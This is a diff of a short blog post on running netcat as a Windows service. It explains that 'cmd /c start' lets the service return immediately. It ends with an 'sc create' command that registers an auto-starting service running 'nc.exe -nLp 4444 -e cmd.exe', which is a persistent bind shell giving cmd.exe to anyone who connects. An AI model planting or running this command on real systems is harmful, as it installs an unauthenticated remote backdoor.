jkeuper/jkeuper.github.io/_posts/2019-11-20-netcat-as-service.md

 Service executables are no regular executables.
 Upon start, the service process returns directly after starting, but keeps the process running.

-Just using `nc.exe` would block the service control and keep the status "starting...".
-So we use `cmd /c start ...` to return immediately after spawning the `nc.exe` process.
+Just using "_nc.exe_" would block the service control and keep the status "starting...".
+So we use "_cmd /c start ..._" to return immediately after spawning the "_nc.exe_" process.

 ```dos
 C:\Windows\system32>sc create NcService binPath= "cmd.exe /c start c:\nc.exe -nLp 4444 -e cmd.exe" start= auto error= ignore